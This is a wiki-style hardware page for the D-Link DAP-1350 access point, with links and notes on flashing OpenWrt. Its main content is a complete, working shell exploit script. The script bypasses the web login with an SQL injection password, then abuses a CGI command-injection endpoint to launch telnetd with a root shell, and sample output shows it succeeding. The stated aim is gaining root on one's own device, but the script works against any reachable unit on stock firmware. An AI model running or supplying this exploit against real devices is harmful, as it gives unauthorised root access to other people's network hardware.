D-Link DAP-1350 rev A1

Links of Interest

 * D-Link DAP-1350 RT3052-based router... can I flash DD-WRT?
 * On the OpenWrt forums
 * Interface emulator

Flashing OpenWRT
OpenWRT trunk contains support for the DAP-1350, however, the 12.09-beta is broken. You can build your own firmware now or wait for the Attitude Adjustment release.

Enabling telnet
A vulnerability was discovered in the stock firmware which allows arbitrary commands to be executed as root using HTTP POST requests to a CGI program. A secondary SQL injection vulnerability also exists allowing one to bypass HTTP authentication.


 * 1) !/bin/ksh


 * 1) DAP-1350 telnetd, by brynet.
 * 2) This effect all stock firmware images for the device.
 * 3) Tested on OpenBSD.

host=$1

if [ $# -ne 1 ]; then echo "usage: $0 host or ip" exit 1; fi

base_req="POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n"\ "Host: ${host}\r\nConnection: keep-alive\r\n"\ "Content-Type: application/x-www-form-urlencoded\r\n"

login_cmd="request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ" login_clen="Content-Length: $(echo -n ${login_cmd} | wc -c)\r\n\r\n" login_req="${base_req}${login_clen}${login_cmd}"
 * 1) user_name=admin
 * 2) user_pwd=';select 1;--

echo $login_req | nc $host 80 | grep default > /dev/null 2>&1 if [ $? -eq 0 ]; then echo "Authenticated." else echo "Failed." exit 1; fi

telnetd_cmd="request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh" telnetd_clen="Content-Length: $(echo -n ${telnetd_cmd} | wc -c)\r\n\r\n" telnetd_req="${base_req}${telnetd_clen}${telnetd_cmd}"

echo $telnetd_req | nc $host 80 > /dev/null 2>&1 sleep 2; nc -z $host 23 > /dev/null 2>&1 if [ $? -eq 0 ]; then echo "Root shell, okey doke." telnet $host else echo "No root.. sorry, heh." exit 1; fi

Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary.

$ ./exploit.sh dlinkap # 192.168.0.50 Authenticated. Root shell, okey doke. Trying 192.168.0.50...   Connected to dlinkap. Escape character is '^]'. ... motd/etc. #

The factory set root password is unknown, so no login(1) process is started.

You must run the exploit script each time the device is powered on.

Pictures
D-Link Images